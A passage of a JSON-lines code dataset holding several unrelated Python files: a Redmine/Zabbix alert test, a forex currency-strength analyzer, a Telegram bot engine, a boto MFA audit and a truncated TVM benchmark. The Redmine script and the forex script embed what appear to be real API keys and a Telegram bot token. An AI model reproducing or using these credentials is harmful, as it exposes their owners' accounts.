None:\n self.log.error('An error occurred while trying to check if the assignment exists {}.'.format(self.coursedir.course_id))\n return True\n\n if self.coursedir.assignment_id in response['assignments']:\n if self.force:\n self.log.info(\"Overwriting files: {} {}\".format(\n self.coursedir.course_id, self.coursedir.assignment_id\n ))\n delete_url = '/assignment/{}/{}'.format(self.coursedir.course_id, self.coursedir.assignment_id)\n response = self.ngshare_api_delete(delete_url)\n if response is None:\n self.fail('An error occurred while trying to delete {}'.format(self.coursedir.assignment_id))\n return True\n else:\n self.fail('Destination already exists, add --force to overwrite: {} {}'.format(\n self.coursedir.course_id, self.coursedir.assignment_id\n ))\n return True\n\n return False\n\n\n def copy_files(self): \n if not self.assignment_exists():\n self.log.info('Encoding assignment')\n data = self.encode_dir(self.src_path)\n response = self.ngshare_api_post(self.dest_path, data)\n if response is None:\n self.log.warning('An error occurred while trying to release {}'.format(self.coursedir.assignment_id))\n else:\n self.log.info('Successfully released {}'.format(self.coursedir.assignment_id))\n","sub_path":"nbgrader/exchange/ngshare/release_assignment.py","file_name":"release_assignment.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"621036441","text":"path_file = \"/home/javi/Desktop/Links\"\n\ntry:\n f = open(path_file, \"r\")\n for _ in range(10):\n print(next(f))\nexcept Exception:\n print(\"The path variable was incorrect!\")\nfinally:\n f.close()\n print(\"Thank you so much for using my program.\")","sub_path":"Task3_Python_WarmUp/A3_Read_file.py","file_name":"A3_Read_file.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"498423746","text":"import sys\nimport argparse\nimport redmine\n\n__author__ = 'amv'\n\n\"\"\"\n\n\"\"\"\n\n\nauth_params={\"server\": \"http://kspd-tracker\",\n \"key\": \"1b2fb6be316492751a29bf119a1b2f9ca108ad49\"}\n # afa75b57d7446e259dd785976af0a75eb0886223 - Admin\n # 1b2fb6be316492751a29bf119a1b2f9ca108ad49 - zabbix\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"to\", help=\"First zabbix alertscripts command-line variable - To\")\n parser.add_argument(\"subject\", help=\"2-nd zabbix alertscripts command-line variable - Subject\")\n parser.add_argument(\"body\", help=\"3-rd zabbix alertscripts command-line variable - Body\")\n parser.add_argument(\"--list\", action='store_const', const=True, default=False, help=\"Print some redmine lists\")\n parser.add_argument(\"--name\", help=\"Load Subject and Body from text file NAME\")\n args = parser.parse_args()\n return args.to, args.subject, args.body, args.list, args.name\n\n\ndef redmine_connect(server,apikey):\n \"\"\"\n Возвращает объект-коннектор redmine с параметрами: использовать формат '%Y.%m.%d', а также не проводить\n верификацию сертификата сервера\n :param server,key - реквизиты доступа к серверу redmine\n :return: оьъект - коннектор к серверу redmine\n \"\"\"\n\ndef get_lists(redmine_descriptor):\n \"\"\"\n Печать и выгрузка в текущий каталог списков проектов, юзеров, групп и трекеров redmine\n :param: коннектор redmine\n :return: нет\n \"\"\"\n\n def printline(fd,s, offset):\n fd.write(offset+str(s)+\"\\n\")\n print(offset+str(s))\n\n def printobject(fd,objs):\n try:\n printline(fd, objs[0],\"\")\n for i in list(objs[1].all()):\n if not isinstance(i,redmine.resources.User):\n printline(fd,str(i.id)+\" \\t\"+i.name,\" \")\n else:\n printline(fd,str(i.id)+\" \\t\"+i.firstname+\" \"+i.lastname,\" \")\n except:\n printline(fd, \"Some error occured!\",\"\")\n\n infolist={\"Projects\":redmine_descriptor.project,\n \"Trackers\":redmine_descriptor.tracker,\n \"Users\":redmine_descriptor.user,\n \"Groups\":redmine_descriptor.group,\n \"Issue statuses\":redmine_descriptor.issue_status}\n fd=open(\"lists\",\"w\", encoding=\"utf-8\")\n for l in infolist.items():\n printobject(fd,l)\n fd.close()\n\noptions = dict(\n loghandler=\"FileHandler\", # Обработчик логов, FileHandler or SysLogHandler\n logdir=\"C:/Amv/Temp/zissue/log\", # Каталог для логфайлов или facility для SysLogHandler\n tmpdir=\"C:/Amv/Temp/zissue\", # Каталог временных файлов\n loglevel=\"DEBUG\", # Уровень логирования\n archivelog=False, # Архивирование логфайлов после ? нереализовано, требует доработки...\n server=\"http://kspd-tracker.life.corp\",\n key=\"\",\n test=True, # В продакшн среде поставить False\n ChannelDOWN = \"message_type project_id tracker_id status_id priority_id assigned_to_id watcher_user_ids \"\n \"channel_id bank office event_id hub channel_type event_date event_time office_comments\",\n ChannelUP = \"message_type channel_id event_id event_recovery_date event_recovery_time event_age\",\n OfficeDOWN = \"message_type project_id tracker_id status_id priority_id assigned_to_id watcher_user_ids \"\n \"office_id bank office event_id event_date event_time office_comments\",\n OfficeUP = \"message_type office_id event_id event_recovery_date event_recovery_time event_age\"\n)\n\nparameters={'assigned_to_id': '6', 'key': '', 'status_id': '1', 'project_id': '2', 'channel_type': 'L2',\n 'server': 'http://kspd-tracker.life.corp', 'tracker_id': '6', 'event_time': '{EVENT.TIME}',\n 'event_id': '223322', 'event_date': '{EVENT.DATE}', 'message_type': 'ChannelDOWN', 'hub': 'ЦО',\n 'channel_id': 'vuzs-1410', 'priority_id': '2', 'bank': 'ВУЗ',\n 'office_comments': 'Нет комментариев', 'watcher_user_ids': '', 'office': 'ОО Победный','cehannel_id': 'vuzs-1410'}\n\nparameters2={'assigned_to_id': '6', 'key': '', 'status_id': '1', 'project_id': '2', 'channel_type': 'L2',\n 'server': 'http://kspd-tracker.life.corp', 'tracker_id': '6', 'event_time': '{EVENT.TIME}',\n 'event_id': '223322', 'event_date': '{EVENT.DATE}', 'message_type': 'ChannelDOWN', 'hub': 'ЦО',\n 'channel_id': 'vuzs-1410', 'priority_id': '2', 'bank': 'ВУЗ',\n 'office_comments': 'Нет комментариев', 'watcher_user_ids': '', 'office': 'ОО Победный'}\n\n\ndef main():\n try:\n fields = options[parameters[\"message_type\"]].split()\n keys = parameters.keys()\n found_fields=[]\n missed_fields=[]\n except KeyError:\n print(\"\\nCritical, message_type parameter not found or incorrect. \")\n sys.exit(1)\n for field in fields:\n if field not in keys:\n missed_fields.append(field)\n else:\n found_fields.append(field)\n if len(missed_fields)>0:\n print(\"\\nCritical, some fields not found: {0}. Found fields: {1}. \".format(missed_fields,found_fields))\n else:\n print (\"Found {0} fields: {1}\".format(len(found_fields),found_fields))\n pass\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"Archives/zissue/zissue-test.py","file_name":"zissue-test.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"466500343","text":"import pandas as pd\nimport numpy as np\nfrom mt4zmq import broker_class as broker\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport telegram\nfrom datetime import datetime\nfrom time import sleep\n\nclass timeframe:\n Current = 0\n M1= 1\n M5= 5\n M15= 15\n M30= 30\n H1= 60\n H4= 240\n Daily= 1440\n Weekly = 10080\n Monthly = 43200\n \nclass sig():\n none = 'none'\n buy = 'BUY'\n sell = 'SELL'\n\ndef Calculate_Abs_Strength(Isymbols, Isym_rev, cs_ohlc_0, cs_ohlc_1, prefix):\n \n symbols = Add_Prefix(Isymbols, prefix)\n sym_rev = Add_Prefix(Isym_rev, prefix)\n \n index = np.arange(len(symbols))\n df = pd.DataFrame(index=index, columns=['symbol','C0','C1'])\n \n \n found_index = None\n \n for i in range(len(symbols)): \n df.iloc[i]['symbol'] = symbols[i]\n \n #This loop is to find the index which contain correct symbol\n for index in range(len(cs_ohlc_0)):\n if cs_ohlc_0[index].symbol == symbols[i]:\n found_index = index\n break\n elif index == len(cs_ohlc_0) and cs_ohlc_0[index].symbol != symbols[i] :\n print('Symbol Not Found')\n \n# print(cs_ohlc_0[found_index].symbol, \" == \", symbols[i] )\n \n if cs_ohlc_0[found_index].symbol == symbols[i]:\n if cs_ohlc_0[found_index].symbol in sym_rev :\n df.iloc[i]['C0'] = 1 / cs_ohlc_0[found_index].close\n else:\n df.iloc[i]['C0'] = cs_ohlc_0[found_index].close\n \n if cs_ohlc_1[found_index].symbol == symbols[i]:\n if cs_ohlc_1[found_index].symbol in sym_rev :\n df.iloc[i]['C1'] = 1 / cs_ohlc_1[found_index].close\n else:\n df.iloc[i]['C1'] = cs_ohlc_1[found_index].close\n \n df['change'] = ((df['C0'] - df['C1']) / df['C1']) * 100\n \n return df\n\ndef Get_Strength_Index(timeframe, shift): \n \n symbols = ['EURUSD', 'GBPUSD', 'AUDUSD', 'NZDUSD', 'USDJPY', 'USDCHF','USDCAD', \\\n 'EURJPY', 'GBPJPY', 'AUDJPY', 'NZDJPY', 'CHFJPY','CADJPY',\\\n 'EURGBP', 'GBPAUD', 'GBPNZD', 'GBPCHF', 'GBPCAD', \\\n 'EURAUD', 'EURNZD', 'EURCHF', 'EURCAD', \\\n 'AUDCHF', 'AUDCAD', 'CADCHF', \\\n 'NZDCHF', 'NZDCAD','AUDNZD']\n symbols = Add_Prefix(symbols, prefix)\n \n sym_usd = ['EURUSD','GBPUSD','AUDUSD','NZDUSD','USDJPY','USDCHF','USDCAD']\n sym_USD_rev=['EURUSD','AUDUSD','GBPUSD','NZDUSD']\n \n sym_eur = ['EURUSD', 'EURGBP', 'EURAUD', 'EURNZD', 'EURJPY','EURCHF','EURCAD']\n sym_EUR_rev = []\n \n sym_jpy = ['USDJPY', 'GBPJPY', 'EURJPY', 'AUDJPY', 'NZDJPY', 'CHFJPY', 'CADJPY']\n sym_JPY_rev = []\n \n sym_gbp = ['GBPUSD', 'GBPJPY', 'EURGBP', 'GBPAUD', 'GBPNZD', 'GBPCHF', 'GBPCAD']\n sym_GBP_rev = ['EURGBP']\n \n sym_aud = ['AUDUSD', 'AUDJPY', 'EURAUD', 'GBPAUD', 'AUDNZD', 'AUDCHF', 'AUDCAD']\n sym_AUD_rev = ['EURAUD', 'GBPAUD']\n \n sym_nzd = ['NZDUSD','NZDJPY','EURNZD','GBPNZD','NZDCHF','NZDCAD','AUDNZD']\n sym_NZD_rev = ['EURNZD','GBPNZD', 'AUDNZD']\n \n sym_cad = ['USDCAD','CADJPY','EURCAD','GBPCAD','NZDCAD','AUDCAD','CADCHF']\n sym_CAD_rev = ['USDCAD','EURCAD','GBPCAD','NZDCAD','AUDCAD']\n \n \n sym_chf = ['CHFJPY','USDCHF','EURCHF','GBPCHF','NZDCHF','AUDCHF','CADCHF']\n sym_CHF_rev = ['USDCHF','EURCHF','GBPCHF','NZDCHF','AUDCHF','CADCHF']\n \n cs_d1_0 = broker1.get_OHLC(symbols, timeframe , shift)\n cs_d1_1 = broker1.get_OHLC(symbols, timeframe , shift + 1)\n \n datetime = cs_d1_0[0].timestamp\n \n index = np.arange(8)\n strength_df = pd.DataFrame(index=index, columns=['Currency', 'ABS_strength'])\n \n USD_df = Calculate_Abs_Strength(sym_usd, sym_USD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_USD = USD_df['change'].sum()\n strength_df.iloc[0]= ['USD', strength_USD]\n \n EUR_df = Calculate_Abs_Strength(sym_eur, sym_EUR_rev, cs_d1_0, cs_d1_1, prefix)\n strength_EUR = EUR_df['change'].sum()\n strength_df.iloc[1]= ['EUR', strength_EUR]\n \n JPY_df = Calculate_Abs_Strength(sym_jpy, sym_JPY_rev, cs_d1_0, cs_d1_1, prefix)\n strength_JPY = JPY_df['change'].sum()\n strength_df.iloc[2]= ['JPY', strength_JPY]\n \n GBP_df = Calculate_Abs_Strength(sym_gbp, sym_GBP_rev, cs_d1_0, cs_d1_1, prefix)\n strength_GBP = GBP_df['change'].sum()\n strength_df.iloc[3]= ['GBP', strength_GBP]\n \n AUD_df = Calculate_Abs_Strength(sym_aud, sym_AUD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_AUD = AUD_df['change'].sum()\n strength_df.iloc[4]= ['AUD', strength_AUD]\n \n NZD_df = Calculate_Abs_Strength(sym_nzd, sym_NZD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_NZD = NZD_df['change'].sum()\n strength_df.iloc[5]= ['NZD', strength_NZD]\n \n CAD_df = Calculate_Abs_Strength(sym_cad, sym_CAD_rev, cs_d1_0, cs_d1_1, prefix)\n strength_CAD = CAD_df['change'].sum()\n strength_df.iloc[6]= ['CAD', strength_CAD]\n \n CHF_df = Calculate_Abs_Strength(sym_chf, sym_CHF_rev, cs_d1_0, cs_d1_1, prefix)\n strength_CHF = CHF_df['change'].sum()\n strength_df.iloc[7]= ['CHF', strength_CHF]\n \n return strength_df, datetime\n\ndef Add_Prefix(symbols, prefix):\n for s in range(len(symbols)):\n symbols[s] = symbols[s] + prefix \n \n return symbols\n\n#to get Daily and H1 Strength\ndef get_abs_strength(sft_D1, sft_H1):\n \n abs_d1, dt_d1 = Get_Strength_Index(tf.Daily, sft_D1)\n abs_h1, dt_h1 = Get_Strength_Index(tf.H1, sft_H1)\n \n sort_d1 = abs_d1.sort_values('ABS_strength', axis=0, ascending=False)\n sort_h1 = abs_h1.sort_values('ABS_strength', axis=0, ascending=False)\n \n return sort_d1, sort_h1, dt_d1, dt_h1\n\n#ti get series of abs strength \ndef get_timeSeries_strength(timeframe, shift):\n \n abs = []\n \n for i in range(shift):\n abs.append(0)\n \n for i in range(len(abs)):\n abs[i] = Get_Strength_Index(timeframe, i)\n abs[i].rename(columns={'ABS_strength': i },inplace = True)\n \n abs_final = pd.DataFrame\n abs_final = abs[len(abs)-1]\n for i in range(len(abs)):\n abs_final = abs_final.merge(abs[len(abs)-2-i])\n \n return abs_final\n\ndef plot_Chart(d1, h1, date, time):\n \n daily_threshold = 2.0\n hourly_threshold = 1.0\n \n x_axis=np.arange(len(h1))\n width = 0.8\n font_ax = FontProperties()\n font_ax.set_size('xx-small')\n \n font_lbl = FontProperties()\n font_lbl.set_size('small')\n font_lbl.set_style('italic')\n \n font_ttl = FontProperties()\n font_ttl.set_size('small')\n# font_ttl.set_weight('bold')\n \n \n plt.subplot(121)\n plt.bar(x_axis, d1['ABS_strength'], width, color = 'red')\n plt.xticks(x_axis,d1['Currency'], fontproperties=font_ax, rotation=90)\n plt.xlabel('currency', fontproperties= font_lbl )\n plt.ylabel('% Change', fontproperties= font_lbl)\n plt.hlines(daily_threshold,0,len(d1), linestyles='--', color='k' )\n plt.hlines(-daily_threshold,0,len(d1), linestyles='--', color='k' )\n plt.title('Daily Absolute Strength\\n ' + str(date), fontproperties= font_ttl)\n \n plt.subplot(122)\n plt.bar(x_axis, h1['ABS_strength'], width, color = 'blue')\n plt.xticks(x_axis,h1['Currency'],fontproperties=font_ax, rotation=90)\n plt.xlabel('currency', fontproperties= font_lbl)\n plt.hlines(hourly_threshold,0,len(h1), linestyles='--', color='k' )\n plt.hlines(-hourly_threshold,0,len(h1), linestyles='--', color='k' )\n plt.title('Hourly Absolute Strength\\n' + str(time), fontproperties= font_ttl)\n plt.savefig('index.png')\n# plt.show()\n \n############################ To detect signal #################################\ndef Get_Signal(symbol, d1, h1):\n# trade_pair = ['EURUSD','GBPUSD','USDJPY','EURJPY']\n daily_high_thres = 2\n daily_low_thres = 0.25\n hourly_high_thres = 1\n hourly_low_thres = 0.25\n \n #get currency\n base_currency = symbol[:3]\n quote_currency = symbol[3:]\n \n# print('\\n', base_currency, quote_currency)\n \n #get base and quote strength for trend (Daily)\n base_sgth_d1 = d1[d1['Currency'] == base_currency].iloc[0,1]\n quote_sgth_d1 = d1[d1['Currency'] == quote_currency].iloc[0,1]\n \n #get base and quote strength for entry (H1)\n base_sgth_h1 = h1[h1['Currency'] == base_currency].iloc[0,1]\n quote_sgth_h1 = h1[h1['Currency'] == quote_currency].iloc[0,1]\n \n# Base Currency factor \n # Check for trend --- Daily\n si = sig()\n signal = si.none\n BUY_trend = False\n SELL_trend = False\n BUY_entry = False\n SELL_entry = False\n \n if base_sgth_d1 > daily_high_thres and quote_sgth_d1 < daily_low_thres :\n BUY_trend = True\n if base_sgth_h1 < -hourly_high_thres and quote_sgth_h1 > -hourly_low_thres :\n BUY_entry = True\n signal = sig.buy\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n elif base_sgth_d1 < -daily_high_thres and quote_sgth_d1 > -daily_low_thres :\n SELL_trend = True\n if base_sgth_h1 > hourly_high_thres and quote_sgth_h1 < hourly_low_thres :\n SELL_entry = True\n signal = sig.sell\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n# Quote currency factor\n #trend Daily\n elif quote_sgth_d1 < -daily_high_thres and base_sgth_d1 > -daily_low_thres :\n BUY_trend = True\n if quote_sgth_h1 > hourly_high_thres and base_sgth_h1 < hourly_low_thres :\n signal = sig.buy\n BUY_entry = True\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n elif quote_sgth_d1 > daily_high_thres and base_sgth_d1 < daily_low_thres :\n SELL_trend = True\n if quote_sgth_h1 < -hourly_high_thres and base_sgth_h1 > -hourly_low_thres :\n signal = sig.sell\n SELL_entry = True\n print(symbol, 'Base='+str(base_sgth_h1), 'Quote='+str(quote_sgth_h1))\n \n #print trend and entry\n# if(BUY_trend or SELL_trend or BUY_entry or SELL_entry):\n# print('\\nsymbol:',symbol)\n# print('Buy Trend:', BUY_trend, ' Sell Trend', SELL_trend ,\\\n# '\\nBuy Entry', BUY_entry,' Sell Entry', SELL_entry) \n \n if BUY_entry:\n signal = si.buy\n elif SELL_entry:\n signal = si.sell\n \n return signal\n \n\n#################################### MAIN #####################################\n\ntoken='488376978:AAFvFovR-Zin9VXR-AhCs0RRXXP149s_rdk'\nbot = telegram.Bot(token= token)\nchat_id=-1001142683257\n\n\n\ntf = timeframe()\n\nprefix ='.lmx'\nmagic_number = 123456\nip_add_1 = '127.0.0.100'\nip_add_2 = '127.0.0.200'\nip_1 = 'tcp://'+ ip_add_1\nip_2 = 'tcp://'+ ip_add_2\n\nbroker1 = broker(ip_1, magic_number)\nbroker2 = broker(ip_2, magic_number)\n\nbroker1.get_acct_info()\nprint(broker1.company)\n\nprev_time = None\ncurr_time = None\n\n#while(1):\n \ncurr_time = datetime.now().hour\n\n#while(curr_time != prev_time):\n\nprev_time = curr_time\nprint(str(prev_time))\n\n\nsig_detect = []\nrecord_tms = []\n\ndaily_CS_shift = 2\nh1_cs_start = 21\nh1_cs_end = 45\n\nfor i in np.arange(h1_cs_start, h1_cs_end):\n \n print(i)\n d1, h1, dt_d1, dt_h1 = get_abs_strength(daily_CS_shift,i)\n \n date = dt_d1.date()\n time = dt_h1.time()\n# print('Date:',dt_d1,'\\nTime:',dt_h1)\n \n plot_Chart(d1, h1, date, time)\n \n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n # bot.send_photo(chat_id=chat_id, photo=open('index.png','rb'), \\\n # caption='absolute strength index\\n'+timestamp)\n \n # sleep(300) #sleep for 5 minit\n \n #trade_pair = ['EURUSD','GBPUSD','USDJPY','EURJPY']\n \n trade_pair = ['EURUSD', 'GBPUSD', 'AUDUSD', 'NZDUSD', 'USDJPY', 'USDCHF','USDCAD', \\\n 'EURJPY', 'GBPJPY', 'AUDJPY', 'NZDJPY', 'CHFJPY','CADJPY',\\\n 'EURGBP', 'GBPAUD', 'GBPNZD', 'GBPCHF', 'GBPCAD', \\\n 'EURAUD', 'EURNZD', 'EURCHF', 'EURCAD', \\\n 'AUDCHF', 'AUDCAD', 'CADCHF', \\\n 'NZDCHF', 'NZDCAD','AUDNZD']\n \n \n \n for symbol in trade_pair:\n \n \n signal = Get_Signal(symbol, d1, h1)\n if signal != sig.none:\n# print('Signal:', signal) \n sig_detect.append(str(i) + ' '+str(dt_h1) + ' ' + symbol + ' ' + signal)\n \n \n record_tms.append(str(dt_h1))\n \nprint('\\n',sig_detect)\nprint('\\n',record_tms)\n\n ","sub_path":"OLD/Avengers_Analyzer.py","file_name":"Avengers_Analyzer.py","file_ext":"py","file_size_in_byte":12481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"308695651","text":"import json\r\nimport telebot\r\nfrom datetime import datetime\r\nimport calendar\r\nimport math\r\nfrom time import sleep\r\nfrom threading import Thread\r\nfrom telebot.types import InlineKeyboardMarkup, InlineKeyboardButton, InputMedia\r\n\r\nBUTTONS_PATH = \"config/buttons.json\"\r\nTEXTS_PATH = \"config/texts.json\"\r\nCONFIG_PATH = \"config/config.json\"\r\nLOGS_PATH = \"logs/\"\r\n\r\nclass ChatUtil():\r\n def __init__(self, id): self.id = id\r\n\r\nclass MessageUtil():\r\n def __init__(self, chatid, messageid):\r\n self.chat = ChatUtil(chatid)\r\n self.message_id = messageid\r\n\r\nclass Engine():\r\n\r\n def __init__(self): \r\n config = json.load(open(CONFIG_PATH, encoding = 'utf-8'))\r\n self.bot = telebot.TeleBot(config['bot']['token'])\r\n self.messages = self.bot.message_handler\r\n self.callbacks = self.bot.callback_query_handler\r\n\r\n def start_polling(self, sleep = 30): BotThread(self, self.bot, sleep).start()\r\n def get_default_params(self, sender):\r\n return {\r\n \"id\": sender.id, \r\n \"firstname\": sender.first_name if sender.first_name else self.get_text(\"anonimous\"),\r\n \"lastname\": sender.last_name if sender.last_name else \"\", \r\n \"username\": \"@\" + sender.username if sender.username else \"\"\r\n } \r\n\r\n def b(self, t, d): return InlineKeyboardButton(text = t, callback_data = d)\r\n def bu(self, t, u): return InlineKeyboardButton(text = t, url = u) \r\n\r\n def build(self, buttons = [], params = {}):\r\n markup = InlineKeyboardMarkup()\r\n for row in buttons:\r\n if type(row) == type([]):\r\n _row = []\r\n for button in row:\r\n if type(button) == type({}):\r\n if \"text\" in button.keys():\r\n text = self.format(button['text'], params)\r\n if \"data\" in button.keys(): \r\n data = self.format(button['data'], params)\r\n _row.append(self.b(text, data))\r\n elif \"url\" in button.keys(): \r\n url = self.format(button['url'], params)\r\n _row.append(self.bu(text, url))\r\n markup.row(*_row)\r\n elif type(row) == type({}):\r\n if \"text\" in row.keys():\r\n text = self.format(row['text'], params)\r\n if \"data\" in row.keys(): \r\n data = self.format(row['data'], params)\r\n markup.row(self.b(text, data))\r\n elif \"url\" in row.keys(): \r\n url = self.format(row['url'], params)\r\n markup.row(self.bu(text, url)) \r\n return markup \r\n \r\n def get_message(self, chatid, messageid): \r\n message = MessageUtil(chatid, messageid)\r\n return message\r\n\r\n def format(self, text, params = {}):\r\n if text:\r\n for key, value in params.items(): text = text.replace(f\"${key}\", str(value))\r\n return text\r\n\r\n def get_text(self, tag, locale = \"ua\"):\r\n texts = json.load(open(TEXTS_PATH, encoding = 'utf-8'))\r\n try: return texts[locale][tag] if type(tag) == type(\"_\") else texts[locale][list(texts[locale].keys())[tag]]\r\n except: pass \r\n\r\n def get_button(self, tag, locale = \"ua\"):\r\n buttons = json.load(open(BUTTONS_PATH, encoding = 'utf-8'))\r\n try: return buttons[locale][tag] if type(tag) == type(\"_\") else buttons[locale][list(buttons[locale].keys())[tag]]\r\n except: pass \r\n\r\n def send(self, id, text, markup = None, params = {}, photo = None):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n if photo: return self.send_photo(id, photo, text, markup, params)\r\n else:\r\n try: return self.bot.send_message(id, self.format(text, params), parse_mode = 'html', reply_markup = markup, disable_web_page_preview = True)\r\n except Exception as e: print(e)\r\n\r\n def send_photo(self, id, photo, caption = None, markup = None, params = {}):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n try: return self.bot.send_photo(id, photo, caption = self.format(caption, params), parse_mode = 'html', reply_markup = markup)\r\n except: pass\r\n\r\n def edit(self, message, text, markup = None, params = {}, photo = None):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n if photo:\r\n media = InputMedia(\"photo\", photo, self.format(text, params), \"html\")\r\n try: return self.bot.edit_message_media(media, message.chat.id, message.message_id, reply_markup = markup)\r\n except:\r\n self.delete(message)\r\n return self.send_photo(message.chat.id, photo, text, markup, params)\r\n else:\r\n try: return self.bot.edit_message_text(self.format(text, params), message.chat.id, message.message_id, parse_mode = 'html', reply_markup = markup, disable_web_page_preview = True)\r\n except: \r\n try:\r\n self.delete(message)\r\n return self.send(message.chat.id, text, markup, params)\r\n except: pass\r\n\r\n def edit_markup(self, message, markup, params = {}):\r\n if markup:\r\n if type(markup) == type([]): markup = self.build(markup, params)\r\n try: return self.bot.edit_message_reply_markup(message.chat.id, message.message_id, reply_markup = markup)\r\n except Exception as e: print(e) \r\n\r\n def delete(self, message):\r\n try: self.bot.delete_message(message.chat.id, message.message_id)\r\n except: pass\r\n\r\n def send_tag(self, id, tag, markup = None, params = {}, photo = None):\r\n text = self.get_text(tag)\r\n return self.send(id, text, markup, params, photo)\r\n\r\n def edit_tag(self, message, tag, markup = None, params = {}, photo = None):\r\n text = self.get_text(tag)\r\n return self.edit(message, text, markup, params, photo)\r\n\r\nclass BotThread(Thread):\r\n def __init__(self, engine, bot, time = 30): \r\n self.bot = bot\r\n self.engine = engine\r\n self.time = time\r\n Thread.__init__(self)\r\n def run(self): \r\n while True:\r\n try: self.bot.polling()\r\n except Exception as e:\r\n self.engine.log(e)\r\n sleep(self.time) ","sub_path":"My_project/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"557177118","text":"#!/usr/bin/python\nimport datetime\nimport csv\nimport glob\nimport xlwt\nimport os\nimport boto.ec2\nimport boto.iam.connection\n\n#GET all regions\nregions= boto.ec2.regions()\n#function to check if MFA is enabled on account\ndef func_MFA_enabled():\n\n\tconnection=boto.iam.connection.IAMConnection()\n\tusers=connection.get_all_users()\n\tno_of_users=len(users['list_users_response']['list_users_result']['users'])\n\twith open('MFA_Enabled.csv','w+') as fp:\n\t\tcsvwriter=csv.writer(fp,delimiter=',')\n\t\tdata=['User Name','MFA Status']\n\t\tcsvwriter.writerow(data)\n\t\tfor user in range(0,no_of_users):\n\t\t\tuser_name=users['list_users_response']['list_users_result']['users'][user]['user_name']\n\t\t\tmfa=connection.get_all_mfa_devices(user_name)\n\t\t\tstatus=mfa['list_mfa_devices_response']['list_mfa_devices_result']['mfa_devices']\n\t\t\tif len(status)==0:\n\t\t\t\tdata=[user_name,\"Not Enabled\"]\n\t\t\t\tcsvwriter.writerow(data)\n\t\t\telse:\n\t\t\t\tdata=[user_name,\"Enabled\"]\n\t\t\t\tcsvwriter.writerow(data)\n\t\t\t\t\nfunc_MFA_enabled()\n\n","sub_path":"iam-boto/mfa_check.py","file_name":"mfa_check.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"474560275","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\"\"\"Benchmark script for various models on Adreno GPU.\n\"\"\"\nimport argparse\n\nimport numpy as np\n\nimport os\nimport sys\nimport tvm\nfrom tvm import te\nfrom tvm.relay import testing\nfrom tvm.contrib.utils import tempdir\nimport tvm.contrib.graph_executor as runtime\nfrom tvm import relay\nfrom tvm import autotvm\nfrom tvm.contrib import utils, ndk\n\n\ndef get_network(name, batch_size, dtype=\"float32\"):\n \"\"\"Get the symbol definition and random weight of a network\n\n Parameters\n ----------\n name: str\n The name of the network, can be 'resnet-18', 'resnet-50', 'vgg-16', 'inception_v3', 'mobilenet', ...\n batch_size: int\n batch size\n dtype: str\n Data type\n\n Returns\n -------\n net: tvm.IRModule\n The relay function of network definition\n params: dict\n The random parameters for benchmark\n input_shape: tuple\n The shape of input tensor\n output_shape: tuple\n The shape of output tensor\n \"\"\"\n input_shape = (batch_size, 3, 224, 224)\n output_shape = (batch_size, 1000)\n\n if name == \"mobilenet\":\n net, params = testing.mobilenet.get_workload(batch_size=batch_size, dtype=dtype)\n elif name == \"inception_v3\":\n input_shape = (batch_size, 3, 299, 299)\n net, params = testing.inception_v3.get_workload(batch_size=batch_size, dtype=dtype)\n elif \"resnet\" in name:\n n_layer = int(name.split(\"-\")[1])\n net, params = testing.resnet.get_workload(\n num_layers=n_layer, batch_size=batch_size, dtype=dtype\n )\n elif \"vgg\" in name:\n n_layer = int(name.split(\"-\")[1])\n net, params = testing.vgg.get_workload(\n num_layers=n_layer, batch_size=batch_size, dtype=dtype\n )\n elif \"densenet\" in name:\n n_layer = int(name.split(\"-\")[1])\n net, params = testing.densenet.get_workload(\n densenet_size=n_layer, batch_size=batch_size, dtype=dtype\n )\n elif \"squeezenet\" in name:\n version = name.split(\"_v\")[1]\n net, params = testing.squeezenet.get_workload(\n batch_size=batch_size, version=version, dtype=dtype\n )\n elif name == \"mxnet\":\n # an example for mxnet model\n from mxnet.gluon.model_zoo.vision import get_model\n\n block = get_model(\"resnet18_v1\", pretrained=True)\n net, params = relay.frontend.from_mxnet(block, shape={\"data\": input_shape}, dtype=dtype)\n net = net[\"main\"]\n net = relay.Function(\n net.params, relay.nn.softmax(net.body), None, net.type_params, net.attrs\n )\n net = tvm.IRModule.from_expr(net)\n else:\n raise ValueError(\"Unsupported network: \" + name)\n\n return net, params, input_shape, output_shape\n\n\ndef print_progress(msg):\n 